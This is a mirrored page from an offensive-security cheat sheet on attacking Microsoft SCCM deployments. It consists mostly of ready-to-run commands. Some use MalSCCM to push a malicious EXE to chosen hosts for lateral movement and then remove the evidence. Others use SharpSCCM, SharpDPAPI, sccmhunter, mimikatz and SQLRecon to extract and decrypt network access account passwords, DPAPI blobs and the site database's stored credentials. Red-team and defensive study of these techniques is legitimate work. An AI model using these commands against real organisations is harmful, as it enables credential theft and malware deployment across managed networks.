swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
InternalAllTheThings/docs/active-directory/deployment-sccm.md

8.3 KiB
Raw Blame History

Deployment - SCCM

Application Deployment

SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.

  • PowerSCCM - PowerShell module to interact with SCCM deployments

  • MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage

  • Using SharpSCCM

    .\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug

  • Compromise client, use locate to find management server

    MalSCCM.exe locate

  • Enumerate over WMI as an administrator of the Distribution Point

    MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups

  • Compromise management server, use locate to find primary server

  • Use inspect on primary server to view who you can target

    MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers
MalSCCM.exe inspect /primaryusers
MalSCCM.exe inspect /groups

  • Create a new device group for the machines you want to laterally move too

    MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
MalSCCM.exe inspect /groups

  • Add your targets into the new group

    MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL

  • Create an application pointing to a malicious EXE on a world readable share : SCCMContentLib$

    MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"
MalSCCM.exe inspect /applications

  • Deploy the application to the target group

    MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
MalSCCM.exe inspect /deployments

  • Force the target group to checkin for updates

    MalSCCM.exe checkin /groupname:TargetGroup

  • Cleanup the application, deployment and group

    MalSCCM.exe app /cleanup /name:demoapp
MalSCCM.exe group /delete /groupname:TargetGroup

SCCM Shares

Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares

  • 1njected/CMLoot 
    Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi

Configuration Manager

CRED-1 Retrieve credentials via PXE boot media

Requirements:

  • On the SCCM Distribution Point: HKLM\Software\Microsoft\SMS\DP\PxeInstalled = 1
  • On the SCCM Distribution Point: HKLM\Software\Microsoft\SMS\DP\IsPxe = 1
  • PXE-enabled distribution point

Exploitation:

CRED-2 Request a policy containing credentials

Requirements:

  • PKI certificates are not required for client authentication
  • Domain accounts credential

Exploitation:

Create a machine or compromise an existing one, then request policies such as NAAConfig

SharpSCCM get secrets -u <username-machine-$> -p <password>
SharpSCCM get naa

CRED-3 Extract currently deployed credentials stored as DPAPI blobs

Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.

Requirements:

  • Local administrator privileges on an SCCM client

Exploitation:

  • Find SCCM blob

    Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>

  • Using GhostPack/SharpDPAPI

    $str = "060...F2DAF"
$bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt

  • Using Mayyhem/SharpSCCM for SCCM retrieval and decryption

    .\SharpSCCM.exe local secrets -m wmi

From a remote machine.

  • Using garrettfoster13/sccmhunter 
    python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto

CRED-4 Extract legacy credentials stored as DPAPI blobs

Requirements:

  • Local administrator privileges on an SCCM client

Exploitation:

  • Search the database using SharpDPAPI

    .\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA

  • Search the database using SharpSCCM

    .\SharpSCCM.exe local secrets -m disk

  • Check ACL for the CIM repository located at C:\Windows\System32\wbem\Repository\OBJECTS.DATA:

    Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
ConvertFrom-SddlString ""

CRED-5 Extract the SC_UserAccount table from the site database

Requirements:

  • Site database access
  • Primary site server access
    • Access to the private key used for encryption

Exploitation:

  • gentilkiwi/mimikatz 
    mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
  • skahwah/SQLRecon, only if the site server and database are hosted on the same system 
    SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
  • SQLRecon + xpn/sccmdecryptpoc.cs 
    SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
sccmdecryptpoc.exe 0C010000080[...]5D6F0

References